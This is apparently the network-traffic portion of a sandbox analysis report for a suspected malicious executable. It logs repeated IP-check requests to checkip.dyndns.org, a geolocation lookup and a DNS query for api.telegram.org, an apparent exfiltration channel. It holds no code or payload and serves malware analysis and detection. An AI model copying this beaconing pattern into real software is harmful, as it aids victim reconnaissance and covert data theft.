                                            Jul 24, 2024 15:08:51.613219976 CEST192.168.2.71.1.1.10x9a77Standard query (0)15.164.165.52.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                            Jul 24, 2024 15:08:19.037156105 CEST1.1.1.1192.168.2.70x4989No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                            Jul 24, 2024 15:08:19.037156105 CEST1.1.1.1192.168.2.70x4989No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                            Jul 24, 2024 15:08:19.037156105 CEST1.1.1.1192.168.2.70x4989No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                            Jul 24, 2024 15:08:19.037156105 CEST1.1.1.1192.168.2.70x4989No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                            Jul 24, 2024 15:08:19.037156105 CEST1.1.1.1192.168.2.70x4989No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                            Jul 24, 2024 15:08:19.037156105 CEST1.1.1.1192.168.2.70x4989No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                            Jul 24, 2024 15:08:19.877916098 CEST1.1.1.1192.168.2.70x77d3No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                            Jul 24, 2024 15:08:19.877916098 CEST1.1.1.1192.168.2.70x77d3No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                            Jul 24, 2024 15:08:35.969769001 CEST1.1.1.1192.168.2.70x7a6dNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                            Jul 24, 2024 15:08:51.861398935 CEST1.1.1.1192.168.2.70x9a77Name error (3)15.164.165.52.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                            • reallyfreegeoip.org
                                            • api.telegram.org
                                            • checkip.dyndns.org
                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            0192.168.2.749702158.101.44.242802916C:\Users\user\Desktop\rPO0977-6745.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 24, 2024 15:08:19.051763058 CEST151OUTGET / HTTP/1.1
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                            Host: checkip.dyndns.org
                                            Connection: Keep-Alive
                                            Jul 24, 2024 15:08:19.649775028 CEST320INHTTP/1.1 200 OK
                                            Date: Wed, 24 Jul 2024 13:08:19 GMT
                                            Content-Type: text/html
                                            Content-Length: 103
                                            Connection: keep-alive
                                            Cache-Control: no-cache
                                            Pragma: no-cache
                                            X-Request-ID: f7439ef7df636c743633f04753fff818
                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                            Jul 24, 2024 15:08:19.665044069 CEST127OUTGET / HTTP/1.1
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                            Host: checkip.dyndns.org
                                            Jul 24, 2024 15:08:19.824407101 CEST320INHTTP/1.1 200 OK
                                            Date: Wed, 24 Jul 2024 13:08:19 GMT
                                            Content-Type: text/html
                                            Content-Length: 103
                                            Connection: keep-alive
                                            Cache-Control: no-cache
                                            Pragma: no-cache
                                            X-Request-ID: 4fb9cfbb46687d312e25cd081b77b635
                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                            Jul 24, 2024 15:08:20.601377964 CEST127OUTGET / HTTP/1.1
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                            Host: checkip.dyndns.org
                                            Jul 24, 2024 15:08:20.756690979 CEST320INHTTP/1.1 200 OK
                                            Date: Wed, 24 Jul 2024 13:08:20 GMT
                                            Content-Type: text/html
                                            Content-Length: 103
                                            Connection: keep-alive
                                            Cache-Control: no-cache
                                            Pragma: no-cache
                                            X-Request-ID: d0bde51ce7300093cf2b16aa028b648d
                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            1192.168.2.749706158.101.44.242802916C:\Users\user\Desktop\rPO0977-6745.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 24, 2024 15:08:21.432101011 CEST127OUTGET / HTTP/1.1
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                            Host: checkip.dyndns.org
                                            Jul 24, 2024 15:08:22.064829111 CEST320INHTTP/1.1 200 OK
                                            Date: Wed, 24 Jul 2024 13:08:21 GMT
                                            Content-Type: text/html
                                            Content-Length: 103
                                            Connection: keep-alive
                                            Cache-Control: no-cache
                                            Pragma: no-cache
                                            X-Request-ID: c03c39c1c8e98df2d73a146c3ed4bc05
                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                            Jul 24, 2024 15:08:22.457161903 CEST320INHTTP/1.1 200 OK
                                            Date: Wed, 24 Jul 2024 13:08:21 GMT
                                            Content-Type: text/html
                                            Content-Length: 103
                                            Connection: keep-alive
                                            Cache-Control: no-cache
                                            Pragma: no-cache
                                            X-Request-ID: c03c39c1c8e98df2d73a146c3ed4bc05
                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                            Jul 24, 2024 15:08:22.458261967 CEST320INHTTP/1.1 200 OK
                                            Date: Wed, 24 Jul 2024 13:08:21 GMT
                                            Content-Type: text/html
                                            Content-Length: 103
                                            Connection: keep-alive
                                            Cache-Control: no-cache
                                            Pragma: no-cache
                                            X-Request-ID: c03c39c1c8e98df2d73a146c3ed4bc05
                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            2192.168.2.749709158.101.44.242808004C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 24, 2024 15:08:23.086457968 CEST151OUTGET / HTTP/1.1
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                            Host: checkip.dyndns.org
                                            Connection: Keep-Alive
                                            Jul 24, 2024 15:08:23.676656961 CEST320INHTTP/1.1 200 OK
                                            Date: Wed, 24 Jul 2024 13:08:23 GMT
                                            Content-Type: text/html
                                            Content-Length: 103
                                            Connection: keep-alive
                                            Cache-Control: no-cache
                                            Pragma: no-cache
                                            X-Request-ID: a8b463e4ff3aca8b6d49952aa6d6afb0
                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                            Jul 24, 2024 15:08:23.687436104 CEST127OUTGET / HTTP/1.1
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                            Host: checkip.dyndns.org
                                            Jul 24, 2024 15:08:23.846412897 CEST320INHTTP/1.1 200 OK
                                            Date: Wed, 24 Jul 2024 13:08:23 GMT
                                            Content-Type: text/html
                                            Content-Length: 103
                                            Connection: keep-alive
                                            Cache-Control: no-cache
                                            Pragma: no-cache
                                            X-Request-ID: 2b19bbf4aa8041894e82efbcef511cfd
                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                            Jul 24, 2024 15:08:25.009537935 CEST127OUTGET / HTTP/1.1
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                            Host: checkip.dyndns.org
                                            Jul 24, 2024 15:08:25.179019928 CEST320INHTTP/1.1 200 OK
                                            Date: Wed, 24 Jul 2024 13:08:25 GMT
                                            Content-Type: text/html
                                            Content-Length: 103
                                            Connection: keep-alive
                                            Cache-Control: no-cache
                                            Pragma: no-cache
                                            X-Request-ID: 8affa4934fe15ac25bf153104ab9ac8f
                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            3192.168.2.749710158.101.44.242802916C:\Users\user\Desktop\rPO0977-6745.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 24, 2024 15:08:23.110166073 CEST151OUTGET / HTTP/1.1
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                            Host: checkip.dyndns.org
                                            Connection: Keep-Alive
                                            Jul 24, 2024 15:08:23.719739914 CEST320INHTTP/1.1 200 OK
                                            Date: Wed, 24 Jul 2024 13:08:23 GMT
                                            Content-Type: text/html
                                            Content-Length: 103
                                            Connection: keep-alive
                                            Cache-Control: no-cache
                                            Pragma: no-cache
                                            X-Request-ID: e1635251a7e82f382724ab670962c989
                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            4192.168.2.749714158.101.44.242802916C:\Users\user\Desktop\rPO0977-6745.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 24, 2024 15:08:24.342401981 CEST151OUTGET / HTTP/1.1
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                            Host: checkip.dyndns.org
                                            Connection: Keep-Alive
                                            Jul 24, 2024 15:08:25.104147911 CEST320INHTTP/1.1 200 OK
                                            Date: Wed, 24 Jul 2024 13:08:24 GMT
                                            Content-Type: text/html
                                            Content-Length: 103
                                            Connection: keep-alive
                                            Cache-Control: no-cache
                                            Pragma: no-cache
                                            X-Request-ID: ee66987d3a7723ed079294eea49f3153
                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            5192.168.2.749717158.101.44.242802916C:\Users\user\Desktop\rPO0977-6745.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 24, 2024 15:08:25.765774012 CEST151OUTGET / HTTP/1.1
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                            Host: checkip.dyndns.org
                                            Connection: Keep-Alive
                                            Jul 24, 2024 15:08:26.338928938 CEST320INHTTP/1.1 200 OK
                                            Date: Wed, 24 Jul 2024 13:08:26 GMT
                                            Content-Type: text/html
                                            Content-Length: 103
                                            Connection: keep-alive
                                            Cache-Control: no-cache
                                            Pragma: no-cache
                                            X-Request-ID: 8e80e6cb84946e743d8905388910974e
                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            6192.168.2.749718158.101.44.242808004C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 24, 2024 15:08:25.820039034 CEST127OUTGET / HTTP/1.1
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                            Host: checkip.dyndns.org
                                            Jul 24, 2024 15:08:26.405514002 CEST320INHTTP/1.1 200 OK
                                            Date: Wed, 24 Jul 2024 13:08:26 GMT
                                            Content-Type: text/html
                                            Content-Length: 103
                                            Connection: keep-alive
                                            Cache-Control: no-cache
                                            Pragma: no-cache
                                            X-Request-ID: 33652566a94e087a62f3e60a04e0e5ad
                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            7192.168.2.749721158.101.44.242802916C:\Users\user\Desktop\rPO0977-6745.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 24, 2024 15:08:27.426820993 CEST151OUTGET / HTTP/1.1
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                            Host: checkip.dyndns.org
                                            Connection: Keep-Alive
                                            Jul 24, 2024 15:08:28.017930984 CEST320INHTTP/1.1 200 OK
                                            Date: Wed, 24 Jul 2024 13:08:27 GMT
                                            Content-Type: text/html
                                            Content-Length: 103
                                            Connection: keep-alive
                                            Cache-Control: no-cache
                                            Pragma: no-cache
                                            X-Request-ID: cbab6ed9d69598737952a58039c31a61
                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            8192.168.2.749722158.101.44.242808004C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 24, 2024 15:08:27.451855898 CEST151OUTGET / HTTP/1.1
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                            Host: checkip.dyndns.org
                                            Connection: Keep-Alive
                                            Jul 24, 2024 15:08:28.037288904 CEST320INHTTP/1.1 200 OK
                                            Date: Wed, 24 Jul 2024 13:08:27 GMT
                                            Content-Type: text/html
                                            Content-Length: 103
                                            Connection: keep-alive
                                            Cache-Control: no-cache
                                            Pragma: no-cache
                                            X-Request-ID: 3bfbb01a97127d3b37f4e4b083b0a437
                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            9192.168.2.749725158.101.44.242802916C:\Users\user\Desktop\rPO0977-6745.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 24, 2024 15:08:28.774483919 CEST151OUTGET / HTTP/1.1
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                            Host: checkip.dyndns.org
                                            Connection: Keep-Alive
                                            Jul 24, 2024 15:08:30.032037020 CEST320INHTTP/1.1 200 OK
                                            Date: Wed, 24 Jul 2024 13:08:29 GMT
                                            Content-Type: text/html
                                            Content-Length: 103
                                            Connection: keep-alive
                                            Cache-Control: no-cache
                                            Pragma: no-cache
                                            X-Request-ID: f4babb687ab767f62db48cffbc27843b
                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            10192.168.2.749726158.101.44.242808004C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 24, 2024 15:08:28.826220989 CEST151OUTGET / HTTP/1.1
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                            Host: checkip.dyndns.org
                                            Connection: Keep-Alive
                                            Jul 24, 2024 15:08:30.127151012 CEST320INHTTP/1.1 200 OK
                                            Date: Wed, 24 Jul 2024 13:08:30 GMT
                                            Content-Type: text/html
                                            Content-Length: 103
                                            Connection: keep-alive
                                            Cache-Control: no-cache
                                            Pragma: no-cache
                                            X-Request-ID: 836917141a9acba8b48d7ad88c58fafd
                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            11192.168.2.749729158.101.44.242808004C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 24, 2024 15:08:30.800734043 CEST151OUTGET / HTTP/1.1
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                            Host: checkip.dyndns.org
                                            Connection: Keep-Alive
                                            Jul 24, 2024 15:08:32.402692080 CEST320INHTTP/1.1 200 OK
                                            Date: Wed, 24 Jul 2024 13:08:32 GMT
                                            Content-Type: text/html
                                            Content-Length: 103
                                            Connection: keep-alive
                                            Cache-Control: no-cache
                                            Pragma: no-cache
                                            X-Request-ID: 508cc5525ea92bd7120565d588364151
                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            12192.168.2.749731158.101.44.242808004C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 24, 2024 15:08:33.053721905 CEST151OUTGET / HTTP/1.1
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                            Host: checkip.dyndns.org
                                            Connection: Keep-Alive
                                            Jul 24, 2024 15:08:35.086693048 CEST320INHTTP/1.1 200 OK
                                            Date: Wed, 24 Jul 2024 13:08:35 GMT
                                            Content-Type: text/html
                                            Content-Length: 103
                                            Connection: keep-alive
                                            Cache-Control: no-cache
                                            Pragma: no-cache
                                            X-Request-ID: f67cc20e8785919d9b13f456c3ca4c8b
                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            13192.168.2.749734158.101.44.242808004C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 24, 2024 15:08:35.752161980 CEST151OUTGET / HTTP/1.1
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                            Host: checkip.dyndns.org
                                            Connection: Keep-Alive
                                            Jul 24, 2024 15:08:37.506752968 CEST320INHTTP/1.1 200 OK
                                            Date: Wed, 24 Jul 2024 13:08:37 GMT
                                            Content-Type: text/html
                                            Content-Length: 103
                                            Connection: keep-alive
                                            Cache-Control: no-cache
                                            Pragma: no-cache
                                            X-Request-ID: dc473c0a97479fb529a6e6f12633f8f4
                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            0192.168.2.749704188.114.97.34432916C:\Users\user\Desktop\rPO0977-6745.exe
                                            TimestampBytes transferredDirectionData
                                            2024-07-24 13:08:20 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                            Host: reallyfreegeoip.org
                                            Connection: Keep-Alive
                                            2024-07-24 13:08:20 UTC703INHTTP/1.1 200 OK
                                            Date: Wed, 24 Jul 2024 13:08:20 GMT
                                            Content-Type: application/xml
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            access-control-allow-origin: *
                                            vary: Accept-Encoding
                                            Cache-Control: max-age=86400
                                            CF-Cache-Status: HIT
                                            Age: 1251
                                            Last-Modified: Wed, 24 Jul 2024 12:47:29 GMT
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SKYf5UTh0RQpEZ0dO2HF7boRJSAaZxHZgYT%2FSmwz%2F1HhmgXT6U8kq2SYz3lTUPZwVFV9EDnElqMoTMoqYp3w9USI3ptcBWsyjEzXWTMqv6Xeo7hKLA4K0ddye0FmbOrRE0ZHLZJE"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 8a84236c1f5d426d-EWR
                                            alt-svc: h3=":443"; ma=86400
